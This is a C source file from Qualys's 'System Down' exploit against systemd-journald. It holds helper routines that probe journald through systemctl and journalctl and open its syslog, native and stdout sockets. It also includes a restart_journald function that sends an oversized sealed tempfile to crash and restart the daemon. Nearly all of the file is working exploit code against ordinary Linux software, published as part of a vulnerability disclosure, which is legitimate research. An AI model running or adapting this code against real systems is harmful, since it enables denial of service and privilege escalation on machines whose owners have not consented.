/*
 * System Down: A systemd-journald exploit
 * https://www.qualys.com/2019/01/09/system-down/system-down.txt
 * Copyright (C) 2019 Qualys, Inc.
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <https://www.gnu.org/licenses/>.
 */

#define _GNU_SOURCE
#include <asm/types.h>
#include <errno.h>
#include <fcntl.h>
#include <inttypes.h>
#include <limits.h>
#include <linux/inet_diag.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <linux/sock_diag.h>
#include <linux/unix_diag.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <syslog.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/statvfs.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/un.h>
#include <time.h>
#include <unistd.h>

#include "journald.h"
#include "macro.h"
#include "target.h"
#include "time-util.h"
#include "wall.h"

journald_t
show_journald(void)
{
    journald_t journald = { 0 };
    struct { bool active, running, processing; } state = { 0 };
    FILE * const fp = popen("systemctl show systemd-journald.service 2>/dev/null", "re");
    if (!fp) die();

    static char buf[65536];
    while (fgets(buf, sizeof(buf), fp) == buf) {
        char * const nl = strchr(buf, '\n');
        if (!nl) die();
        *nl = '\0';

        char * const eq = strchr(buf, '=');
        if (!eq) die();
        *eq = '\0';
        const char * const var = buf;
        const char * const val = eq + 1;

        #define UMAX_OR_DIE() ({ \
            errno = 0; \
            char * end = NULL; \
            const uintmax_t umax = strtoumax(val, &end, 10); \
            const bool valid_umax = (!errno && end > val && !*end); \
            if (!valid_umax) die(); \
            umax; \
        })

        #define USEC_OR_DIE() ({ \
            usec_t usec = 0; \
            const bool valid_usec = (strstr(var, "USec") && !parse_sec(val, &usec)); \
            if (!valid_usec) die(); \
            usec; \
        })

        if (!strcmp(var, "MainPID")) {
            journald.MainPID = UMAX_OR_DIE();
            if (journald.MainPID <= 0) break;

        } else if (!strcmp(var, "LimitSTACKSoft")) {
            journald.LimitSTACKSoft = UMAX_OR_DIE();

        } else if (!strcmp(var, "StartLimitBurst")) {
            journald.StartLimitBurst = UMAX_OR_DIE();

        } else if (!strcmp(var, "StartLimitInterval") ||
                   !strcmp(var, "StartLimitIntervalSec")) {
            journald.StartLimitInterval = UMAX_OR_DIE();

        } else if (!strcmp(var, "StartLimitIntervalUSec")) {
            journald.StartLimitInterval = USEC_OR_DIE();

        } else if (!strcmp(var, "WatchdogUSec")) {
            journald.WatchdogUSec = USEC_OR_DIE();

        } else if (!strcmp(var, "ActiveState")) {
            state.active = !strcmp(val, "active");

        } else if (!strcmp(var, "SubState")) {
            state.running = !strcmp(val, "running");

        } else if (!strcmp(var, "StatusText")) {
            state.processing = !strcmp(val, "Processing requests...");

        } else if (!strcmp(var, "Restart")) {
            if (strcmp(val, "always")) die();
        }
    }
    if (pclose(fp) == -1) die();

    if (!state.active || !state.running || !state.processing)
        journald.MainPID = 0;
    if (journald.MainPID >= PID_MAX_LIMIT) die();

    if (journald.LimitSTACKSoft <= 0)
        journald.LimitSTACKSoft = _STK_LIM;
    if (journald.LimitSTACKSoft != _STK_LIM) die();

    if (journald.StartLimitBurst <= 0)
        journald.StartLimitBurst = 5;

    if (journald.StartLimitInterval <= 0)
        journald.StartLimitInterval = 10 * USEC_PER_SEC;
    if (journald.StartLimitInterval >= USEC_INFINITY) die();

    if (journald.WatchdogUSec < 1 * USEC_PER_MINUTE)
        journald.WatchdogUSec = 1 * USEC_PER_MINUTE;
    if (journald.WatchdogUSec > 1 * USEC_PER_HOUR)
        journald.WatchdogUSec = 1 * USEC_PER_HOUR;

    return journald;
}

size_t
journald_LimitSTACKSoft(void)
{
    static journald_t journald;
    if (journald.MainPID <= 0) {
        journald = show_journald();
        if (journald.MainPID <= 0) die();
        if (journald.LimitSTACKSoft <= 0) die();
        if (journald.LimitSTACKSoft >= SIZE_MAX) die();
    }
    return journald.LimitSTACKSoft;
}

usec_t
journald_WatchdogUSec(void)
{
    static journald_t journald;
    if (journald.MainPID <= 0) {
        journald = show_journald();
        if (journald.MainPID <= 0) die();
        if (journald.WatchdogUSec <= 0) die();
        if (journald.WatchdogUSec >= USEC_INFINITY) die();
    }
    return journald.WatchdogUSec;
}

unsigned
make_syslog_priority(void)
{
    return LOG_MAKEPRI(LOG_USER, use_wall() ? LOG_EMERG : LOG_DEBUG);
}

void
generate_syslog_identifier(char * const buf, const size_t size)
{
    if (!buf) die();
    if (size <= 1) die();
    const size_t len = size - 1;

    size_t i;
    buf[0] = '_';
    for (i = 1; i < len; i++) {
        static const char alnum[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
        buf[i] = alnum[(size_t)random() % (sizeof(alnum)-1)];
    }
    if (i != len) die();
    buf[i] = '\0';
}

size_t
read_from_journal(const char * const identifier, char * const buf, const size_t size)
{
    if (use_wall()) return read_from_wall(identifier, buf, size);

    if (!buf) die();
    if (size <= 1) die();
    if (!identifier) die();
    const size_t identifier_len = strlen(identifier);
    if (identifier_len <= 0) die();

    enum {
        SD_JOURNAL_SYSTEM = 4,
        SD_JOURNAL_USER = 8,
    };
    static int journal_type = SD_JOURNAL_USER;
    static int permission_denied = 0;
    static bool first_call = true;

    TIMED_WHILE (true) {
        usleep(10 * USEC_PER_MSEC);
        size_t len = 0;
      {
        static char command[256];
        xsnprintf(command, sizeof(command), "journalctl %s --lines=1 --identifier=%s --all --quiet %s",
            (journal_type & SD_JOURNAL_USER) ? "--user" : "--system", identifier,
            first_call ? "2>&1" : "2>/dev/null");

        FILE * const fp = popen(command, "re");
        if (!fp) die();
        for (;;) {
            const size_t nbr = fread(buf + len, 1, size - len, fp);
            if (nbr <= 0) {
                if (!feof(fp)) die();
                if (ferror(fp)) die();
                break;
            }
            if (nbr >= size - len) die();
            len += nbr;
        }
        if (pclose(fp) == -1) die();
      }

        if (memmem(buf, len, identifier, identifier_len)) {
            if (first_call) printf("journal_type %d\n", journal_type);
            first_call = false;
            return len;
        }

        if (first_call) {
            #define NO_JOURNAL_FILES_OPENED "No journal files were opened due to insufficient permissions."
            if (memmem(buf, len, NO_JOURNAL_FILES_OPENED, sizeof(NO_JOURNAL_FILES_OPENED)-1)) {
                permission_denied |= journal_type;
                if ((permission_denied & SD_JOURNAL_USER) &&
                    (permission_denied & SD_JOURNAL_SYSTEM)) {
                    puts(NO_JOURNAL_FILES_OPENED);
                    die();
                }
            }
            if (journal_type & SD_JOURNAL_USER) {
                journal_type = SD_JOURNAL_SYSTEM;
            } else {
                journal_type = SD_JOURNAL_USER;
            }
        }
    }
    die();
}

static void
set_socket_options(const int socket_fd)
{
    static const int options[] = { SO_SNDBUF, SO_RCVBUF };
    size_t i;
    for (i = 0; i < ELEMENTSOF(options); i++) {
        const int optname = options[i];

        int optval = INT_MAX;
        socklen_t optlen = sizeof(optval);
        if (setsockopt(socket_fd, SOL_SOCKET, optname, &optval, optlen)) die();

        optval = 0;
        if (getsockopt(socket_fd, SOL_SOCKET, optname, &optval, &optlen)) die();
        if (optlen != sizeof(optval)) die();
        if (optval <= DEFAULT_MMAP_THRESHOLD_MIN) die();
    }
}

int
open_syslog_connection(void)
{
    const int syslog_fd = socket(AF_UNIX, SOCK_DGRAM | SOCK_CLOEXEC, 0);
    if (syslog_fd <= -1) die();

    struct sockaddr_un sa = { .sun_family = AF_UNIX };
    xsnprintf(sa.sun_path, sizeof(sa.sun_path), "%s", target_dev_log());

    if (connect(syslog_fd, (const struct sockaddr *)&sa, sizeof(sa))) die();
    set_socket_options(syslog_fd);
    return syslog_fd;
}

void
ping_syslog_server(void)
{
    static char buf[65536];
    static char identifier[11 + 1];
    generate_syslog_identifier(identifier, sizeof(identifier));
  {
    const unsigned priority = make_syslog_priority();
    const unsigned len = xsnprintf(buf, sizeof(buf), "<%u>%s: a", priority, identifier);

    const int syslog_fd = open_syslog_connection();
    xwrite(syslog_fd, buf, len);
    if (close(syslog_fd)) die();
  }
    const size_t len = read_from_journal(identifier, buf, sizeof(buf));
    if (!memmem(buf, len, identifier, strlen(identifier))) die();
}

int
open_native_connection(void)
{
    const int native_fd = socket(AF_UNIX, SOCK_DGRAM | SOCK_CLOEXEC, 0);
    if (native_fd <= -1) die();

    static const struct sockaddr_un sa = {
        .sun_family = AF_UNIX,
        .sun_path = "/run/systemd/journal/socket",
    };
    if (connect(native_fd, (const struct sockaddr *)&sa, sizeof(sa))) die();
    set_socket_options(native_fd);
    return native_fd;
}

/* flags for memfd_create(2) (unsigned int) */
#ifndef MFD_CLOEXEC
#define MFD_CLOEXEC             0x0001U
#define MFD_ALLOW_SEALING       0x0002U
#define MFD_HUGETLB             0x0004U
#endif

tempfile_t
open_native_tempfile(const bool try_memfd, const size_t estimated_size)
{
    if (try_memfd && !target_deny_memfd()) {
        const long fd = syscall(SYS_memfd_create, "tempfile", MFD_ALLOW_SEALING | MFD_CLOEXEC);
        if (fd != -1) {
            if (fd <= -1) die();
            if (fd >= INT_MAX) die();
            const tempfile_t tempfile = { .fd = fd, .is_memfd = true };
            return tempfile;
        }
    }

    static const char * const directories[] = { "/var/tmp/", "/tmp/", "/dev/shm/" };
    size_t i;
    for (i = 0; i < ELEMENTSOF(directories); i++) {
        const char * const directory = directories[i];

        struct statvfs fs;
        if (statvfs(directory, &fs)) continue;
        if (fs.f_bsize <= 0) continue;
        if (estimated_size / fs.f_bsize >= fs.f_bavail) continue;

        static char filename[PATH_MAX];
        xsnprintf(filename, sizeof(filename), "%s/tempfile.XXXXXX", directory);

        const int fd = mkostemp(filename, O_CLOEXEC);
        if (fd <= -1) continue;
        if (unlink(filename)) die();
        const tempfile_t tempfile = { .fd = fd, .is_memfd = false };
        return tempfile;
    }
    die();
}

size_t
native_tempfile_size(const tempfile_t tempfile)
{
    if (tempfile.fd <= -1) die();

    struct stat st;
    if (fstat(tempfile.fd, &st)) die();
    if (!S_ISREG(st.st_mode)) die();

    if (st.st_size <= 0) die();
    if (st.st_size >= SSIZE_MAX) die();
    return st.st_size;
}

#ifndef F_LINUX_SPECIFIC_BASE
#define F_LINUX_SPECIFIC_BASE   1024
#endif

/*
 * Set/Get seals
 */
#ifndef F_ADD_SEALS
#define F_ADD_SEALS     (F_LINUX_SPECIFIC_BASE + 9)
#define F_GET_SEALS     (F_LINUX_SPECIFIC_BASE + 10)
#endif

/*
 * Types of seals
 */
#ifndef F_SEAL_SEAL
#define F_SEAL_SEAL     0x0001  /* prevent further seals from being set */
#define F_SEAL_SHRINK   0x0002  /* prevent file from shrinking */
#define F_SEAL_GROW     0x0004  /* prevent file from growing */
#define F_SEAL_WRITE    0x0008  /* prevent writes */
#endif

static void
seal_native_tempfile(const tempfile_t tempfile)
{
    if (tempfile.fd <= -1) die();
    if (!tempfile.is_memfd) return;

    const int seals = F_SEAL_SHRINK | F_SEAL_GROW | F_SEAL_WRITE | F_SEAL_SEAL;
    if (fcntl(tempfile.fd, F_GET_SEALS) == seals) return;
    if (fcntl(tempfile.fd, F_ADD_SEALS, seals)) die();
    if (fcntl(tempfile.fd, F_GET_SEALS) != seals) die();
}

void
send_native_tempfile(const int native_fd, const tempfile_t tempfile)
{
    if (native_fd <= -1) die();
    if (tempfile.fd <= -1) die();

    if (lseek(tempfile.fd, 0, SEEK_SET) != 0) die();
    if (native_tempfile_size(tempfile) > ENTRY_SIZE_MAX) die();
    seal_native_tempfile(tempfile);

    struct msghdr msg = { 0 };
    char control[CMSG_SPACE(sizeof(int))] = { 0 };
    msg.msg_control = control;
    msg.msg_controllen = sizeof(control);

    struct cmsghdr * const cmsg = CMSG_FIRSTHDR(&msg);
    if (!cmsg) die();
    cmsg->cmsg_level = SOL_SOCKET;
    cmsg->cmsg_type = SCM_RIGHTS;
    cmsg->cmsg_len = CMSG_LEN(sizeof(int));
    if (msg.msg_controllen != CMSG_SPACE(sizeof(int))) die();
    int * const fdp = (void *)CMSG_DATA(cmsg);
    *fdp = tempfile.fd;

    if (sendmsg(native_fd, &msg, 0) != 0) die();
}

static void
send_unix_peer_request(const int netlink_fd, const uint32_t unix_inode)
{
    if (netlink_fd <= -1) die();
    if (unix_inode <= 0) die();

    const struct req {
        struct nlmsghdr nlh;
        struct unix_diag_req udr;
    } req = {
        .nlh = {
            .nlmsg_len = sizeof(req),
            .nlmsg_type = SOCK_DIAG_BY_FAMILY,
            .nlmsg_flags = NLM_F_REQUEST,
        },
        .udr = {
            .sdiag_family = AF_UNIX,
            .udiag_ino = unix_inode,
            .udiag_cookie = { INET_DIAG_NOCOOKIE, INET_DIAG_NOCOOKIE },
            .udiag_show = UDIAG_SHOW_PEER,
        },
    };
    if (sizeof(req) != NLMSG_SPACE(sizeof(req.udr))) die();
    if (sizeof(req) != NLMSG_LENGTH(sizeof(req.udr))) die();
    if (offsetof(struct req, udr) != NLMSG_LENGTH(0)) die();

    static const struct sockaddr_nl nla = {
        .nl_family = AF_NETLINK,
    };
    const struct iovec iov = {
        .iov_base = (void *)&req,
        .iov_len = sizeof(req),
    };
    const struct msghdr msg = {
        .msg_name = (void *)&nla,
        .msg_namelen = sizeof(nla),
        .msg_iov = (void *)&iov,
        .msg_iovlen = 1,
    };

    if (sendmsg(netlink_fd, &msg, 0) != (ssize_t)sizeof(req)) die();
}

static uint32_t
recv_unix_peer_response(const int netlink_fd)
{
    if (netlink_fd <= -1) die();

    static char buf[65536];
    static const struct iovec iov = {
        .iov_base = buf,
        .iov_len = sizeof(buf),
    };
    struct msghdr msg = {
        .msg_iov = (void *)&iov,
        .msg_iovlen = 1,
    };

    const ssize_t __nbr = recvmsg(netlink_fd, &msg, 0);
    if (msg.msg_flags) die();
    if (__nbr <= 0) die();
    size_t nbr = __nbr;
    const struct nlmsghdr * nlh = (const void *)buf;

    for (; NLMSG_OK(nlh, nbr); nlh = NLMSG_NEXT(nlh, nbr)) {
        if (nlh->nlmsg_type != SOCK_DIAG_BY_FAMILY) continue;

        const struct unix_diag_msg * const udm = NLMSG_DATA(nlh);
        if (nlh->nlmsg_len <= NLMSG_LENGTH(sizeof(*udm))) die();
        size_t len = nlh->nlmsg_len - NLMSG_LENGTH(sizeof(*udm));
        const struct rtattr * rta = (const void *)(udm + 1);

        for (; RTA_OK(rta, len); rta = RTA_NEXT(rta, len)) {
            if (rta->rta_type != UNIX_DIAG_PEER) continue;

            if (RTA_PAYLOAD(rta) != sizeof(uint32_t)) die();
            const uint32_t peer_inode = *(const uint32_t *)RTA_DATA(rta);
            if (peer_inode > 0) return peer_inode;
        }
    }
    return 0;
}

static peer_t
show_unix_peer(const int unix_fd)
{
    if (unix_fd <= -1) die();

    struct stat unix_st;
    if (fstat(unix_fd, &unix_st)) die();
    if (!S_ISSOCK(unix_st.st_mode)) die();
    if (unix_st.st_ino <= 0) die();
    if (unix_st.st_ino > UINT32_MAX) die();

    uint32_t peer_inode = 0;
  {
    const int netlink_fd = socket(AF_NETLINK, SOCK_DGRAM | SOCK_CLOEXEC, NETLINK_SOCK_DIAG);
    if (netlink_fd <= -1) die();

    TIMED_WHILE (true) {
        send_unix_peer_request(netlink_fd, unix_st.st_ino);
        peer_inode = recv_unix_peer_response(netlink_fd);
        if (peer_inode > 0) break;
        usleep(1 * USEC_PER_MSEC);
    }
    if (close(netlink_fd)) die();
  }
    const peer_t peer = {
        .dev = unix_st.st_dev,
        .ino = peer_inode,
    };
    return peer;
}

static bool
state_file_exists(const stream_t stream)
{
    if (stream.fd <= -1) die();
    const peer_t peer = stream.peer;
    if (peer.ino <= 0) die();

    struct stat st;
    static const char directory[] = "/run/systemd/journal/streams";
    static bool state_directory_exists = false;
    if (!state_directory_exists) {
        if (lstat(directory, &st)) die();
        if (!S_ISDIR(st.st_mode)) die();
        state_directory_exists = true;
    }

    static char filename[PATH_MAX];
    xsnprintf(filename, sizeof(filename), "%s/%lu:%lu", directory, peer.dev, peer.ino);

    const int error = lstat(filename, &st);
    if (error) {
        if (error != -1) die();
        if (errno != ENOENT) die();
        return false;
    }
    if (!S_ISREG(st.st_mode)) die();
    return true;
}

stream_t
open_stdout_stream(void)
{
    unsigned i;
    for (i = 0; i < 2; i++) {
        const int fd = socket(AF_UNIX, SOCK_STREAM | SOCK_CLOEXEC, 0);
        if (fd <= -1) die();

        static const struct sockaddr_un sa = {
            .sun_family = AF_UNIX,
            .sun_path = "/run/systemd/journal/stdout",
        };
        if (connect(fd, (const struct sockaddr *)&sa, sizeof(sa))) die();

        const peer_t peer = show_unix_peer(fd);
        if (peer.ino <= 0) die();

        const stream_t stream = {
            .fd = fd,
            .peer = peer,
        };
        if (state_file_exists(stream)) die();

        #define IDENTIFIER_64 "ABCDEFGHIJKLMNOPQRSTUVWXYZ-abcdefghijklmnopqrstuvwxyz.0123456789"
        #define IDENTIFIER_256 IDENTIFIER_64 IDENTIFIER_64 IDENTIFIER_64 IDENTIFIER_64
        #define IDENTIFIER_1024 IDENTIFIER_256 IDENTIFIER_256 IDENTIFIER_256 IDENTIFIER_256

        static const char save[] = IDENTIFIER_1024 "\n\n15\n0\n0\n0\n0\n";
        const size_t skip = (size_t)random() % 1024;
        if (skip >= sizeof(save)) die();
        if (send(fd, save + skip, sizeof(save) - skip, MSG_NOSIGNAL) !=
                        (ssize_t)(sizeof(save) - skip)) goto cleanup;

        TIMED_WHILE (true) {
            if (state_file_exists(stream)) return stream;
            if (send(fd, "\0", 1, MSG_NOSIGNAL | MSG_DONTWAIT) == -1) {
                if (errno == EPIPE || errno == ECONNRESET) goto cleanup;
                if (errno != EAGAIN && errno != EWOULDBLOCK) die();
            }
            usleep(1 * USEC_PER_MSEC);
        }
cleanup:
        if (close(fd)) die();
    }
    die();
}

void
close_stdout_stream(const stream_t stream)
{
    if (stream.fd <= -1) die();
    if (!state_file_exists(stream)) die();

    if (close(stream.fd)) die();

    TIMED_WHILE (true) {
        if (!state_file_exists(stream)) return;
        usleep(1 * USEC_PER_MSEC);
    }
    die();
}

static void
sleep_after_restart(const journald_t journald)
{
    if (journald.MainPID <= 0) die();
    if (journald.StartLimitBurst <= 0) die();
    const uintmax_t interval = journald.StartLimitInterval / journald.StartLimitBurst;
    if (interval >= 1 * USEC_PER_HOUR) die();

    const struct timespec interval_ts = {
        .tv_sec  = interval / USEC_PER_SEC,
        .tv_nsec = interval % USEC_PER_SEC * NSEC_PER_USEC,
    };
    if (clock_nanosleep(CLOCK_MONOTONIC, 0, &interval_ts, NULL)) die();
}

void
restart_journald(void)
{
  {
    const stream_t stream = open_stdout_stream();
    close_stdout_stream(stream);
  }

    static uintmax_t last_pid = 0;
  {
    const journald_t journald = show_journald();
    if (journald.MainPID <= 0) die();

    if (last_pid <= 0 || journald.MainPID == last_pid) {
        if (last_pid <= 0) {
            last_pid = journald.MainPID;
            sleep_after_restart(journald);
        }

        static tempfile_t tempfile = { .fd = -1 };
        if (tempfile.fd <= -1) {
            size_t iovec_n = journald_LimitSTACKSoft() / sizeof(EntryItem);
            tempfile = open_native_tempfile(true, iovec_n * NATIVE_ITEM_LEN);
            if (tempfile.fd <= -1) die();

            size_t i;
            static char buf[1048576];
            const size_t inbuf_n = sizeof(buf) / NATIVE_ITEM_LEN;
            for (i = 0; i < inbuf_n; i++) {
                memcpy(buf + i * NATIVE_ITEM_LEN, NATIVE_ITEM, NATIVE_ITEM_LEN);
            }
            while (iovec_n) {
                const size_t write_n = MIN(iovec_n, inbuf_n);
                xwrite(tempfile.fd, buf, write_n * NATIVE_ITEM_LEN);
                iovec_n -= write_n;
            }
        }
        const int native_fd = open_native_connection();
        send_native_tempfile(native_fd, tempfile);
        if (close(native_fd)) die();
    }
  }

    TIMED_WHILE (true) {
        usleep(10 * USEC_PER_MSEC);
        const journald_t journald = show_journald();
        if (journald.MainPID <= 0 || journald.MainPID == last_pid) continue;
        last_pid = journald.MainPID;
        sleep_after_restart(journald);
        return;
    }
    die();
}

